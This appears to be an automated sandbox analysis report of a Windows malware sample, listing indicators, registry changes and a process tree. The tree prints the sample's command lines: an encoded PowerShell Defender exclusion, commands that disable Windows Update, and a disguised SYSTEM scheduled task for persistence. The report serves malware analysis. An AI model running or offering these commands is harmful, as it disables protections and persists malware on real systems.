Analysis
-
max time kernel
300s -
max time network
306s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
10-05-2022 22:21
Static task
static1
Behavioral task
behavioral1
Sample
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Resource
win7-20220414-en
General
-
Target
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
-
Size
5.3MB
-
MD5
52fdd7f3ed1b50bc5794983a37cb4064
-
SHA1
4a185751e9e94dccb3330ca79f893de7ca080482
-
SHA256
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
-
SHA512
4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 1604 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2268 takeown.exe 1280 icacls.exe 3708 takeown.exe 2396 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2268 takeown.exe 1280 icacls.exe 3708 takeown.exe 2396 icacls.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3836 set thread context of 940 3836 conhost.exe conhost.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Program Files\Windows\services.exe conhost.exe File created C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2120 reg.exe 3472 reg.exe 2288 reg.exe 1172 reg.exe 3472 reg.exe 308 reg.exe 2404 reg.exe 2180 reg.exe 2120 reg.exe 500 reg.exe 2196 reg.exe 3660 reg.exe 420 reg.exe 1524 reg.exe 3644 reg.exe 160 reg.exe 3656 reg.exe 2128 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe 1852 conhost.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 3836 conhost.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exedescription pid process Token: SeDebugPrivilege 3944 powershell.exe Token: SeIncreaseQuotaPrivilege 3944 powershell.exe Token: SeSecurityPrivilege 3944 powershell.exe Token: SeTakeOwnershipPrivilege 3944 powershell.exe Token: SeLoadDriverPrivilege 3944 powershell.exe Token: SeSystemProfilePrivilege 3944 powershell.exe Token: SeSystemtimePrivilege 3944 powershell.exe Token: SeProfSingleProcessPrivilege 3944 powershell.exe Token: SeIncBasePriorityPrivilege 3944 powershell.exe Token: SeCreatePagefilePrivilege 3944 powershell.exe Token: SeBackupPrivilege 3944 powershell.exe Token: SeRestorePrivilege 3944 powershell.exe Token: SeShutdownPrivilege 3944 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeSystemEnvironmentPrivilege 3944 powershell.exe Token: SeRemoteShutdownPrivilege 3944 powershell.exe Token: SeUndockPrivilege 3944 powershell.exe Token: SeManageVolumePrivilege 3944 powershell.exe Token: 33 3944 powershell.exe Token: 34 3944 powershell.exe Token: 35 3944 powershell.exe Token: 36 3944 powershell.exe Token: SeDebugPrivilege 1852 conhost.exe Token: SeTakeOwnershipPrivilege 2268 takeown.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2372 powershell.exe Token: SeIncreaseQuotaPrivilege 2372 powershell.exe Token: SeSecurityPrivilege 2372 powershell.exe Token: SeTakeOwnershipPrivilege 2372 powershell.exe Token: SeLoadDriverPrivilege 2372 powershell.exe Token: SeSystemtimePrivilege 2372 powershell.exe Token: SeBackupPrivilege 2372 powershell.exe Token: SeRestorePrivilege 2372 powershell.exe Token: SeShutdownPrivilege 2372 powershell.exe Token: SeSystemEnvironmentPrivilege 2372 powershell.exe Token: SeUndockPrivilege 2372 powershell.exe Token: SeManageVolumePrivilege 2372 powershell.exe Token: SeDebugPrivilege 3836 conhost.exe Token: SeTakeOwnershipPrivilege 3708 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.execonhost.execmd.execmd.execmd.execmd.exeservices.execonhost.execmd.exedescription pid process target process PID 1780 wrote to memory of 1852 1780 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe conhost.exe PID 1780 wrote to memory of 1852 1780 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe conhost.exe PID 1780 wrote to memory of 1852 1780 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe conhost.exe PID 1852 wrote to memory of 4012 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 4012 1852 conhost.exe cmd.exe PID 4012 wrote to memory of 3944 4012 cmd.exe powershell.exe PID 4012 wrote to memory of 3944 4012 cmd.exe powershell.exe PID 1852 wrote to memory of 1144 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 1144 1852 conhost.exe cmd.exe PID 1144 wrote to memory of 540 1144 cmd.exe sc.exe PID 1144 wrote to memory of 540 1144 cmd.exe sc.exe PID 1144 wrote to memory of 2212 1144 cmd.exe sc.exe PID 1144 wrote to memory of 2212 1144 cmd.exe sc.exe PID 1144 wrote to memory of 3160 1144 cmd.exe sc.exe PID 1144 wrote to memory of 3160 1144 cmd.exe sc.exe PID 1144 wrote to memory of 492 1144 cmd.exe sc.exe PID 1144 wrote to memory of 492 1144 cmd.exe sc.exe PID 1144 wrote to memory of 420 1144 cmd.exe sc.exe PID 1144 wrote to memory of 420 1144 cmd.exe sc.exe PID 1144 wrote to memory of 2120 1144 cmd.exe reg.exe PID 1144 wrote to memory of 2120 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1172 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1172 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3472 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3472 1144 cmd.exe reg.exe PID 1144 wrote to memory of 308 1144 cmd.exe reg.exe PID 1144 wrote to memory of 308 1144 cmd.exe reg.exe PID 1144 wrote to memory of 160 1144 cmd.exe reg.exe PID 1144 wrote to memory of 160 1144 cmd.exe reg.exe PID 1144 wrote to memory of 2268 1144 cmd.exe takeown.exe PID 1144 wrote to memory of 2268 1144 cmd.exe takeown.exe PID 1144 wrote to memory of 1280 1144 cmd.exe icacls.exe PID 1144 wrote to memory of 1280 1144 cmd.exe icacls.exe PID 1852 wrote to memory of 2900 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 2900 1852 conhost.exe cmd.exe PID 2900 wrote to memory of 3720 2900 cmd.exe schtasks.exe PID 2900 wrote to memory of 3720 2900 cmd.exe schtasks.exe PID 1852 wrote to memory of 2948 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 2948 1852 conhost.exe cmd.exe PID 2948 wrote to memory of 1212 2948 cmd.exe schtasks.exe PID 2948 wrote to memory of 1212 2948 cmd.exe schtasks.exe PID 1604 wrote to memory of 3836 1604 services.exe conhost.exe PID 1604 wrote to memory of 3836 1604 services.exe conhost.exe PID 1604 wrote to memory of 3836 1604 services.exe conhost.exe PID 3836 wrote to memory of 1580 3836 conhost.exe cmd.exe PID 3836 wrote to memory of 1580 3836 conhost.exe cmd.exe PID 1580 wrote to memory of 2372 1580 cmd.exe powershell.exe PID 1580 wrote to memory of 2372 1580 cmd.exe powershell.exe PID 1144 wrote to memory of 2404 1144 cmd.exe reg.exe PID 1144 wrote to memory of 2404 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3660 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3660 1144 cmd.exe reg.exe PID 1144 wrote to memory of 2180 1144 cmd.exe reg.exe PID 1144 wrote to memory of 2180 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3656 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3656 1144 cmd.exe reg.exe PID 1144 wrote to memory of 3880 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 3880 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 3684 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 3684 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 2640 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 2640 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 540 1144 cmd.exe schtasks.exe PID 1144 wrote to memory of 540 1144 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
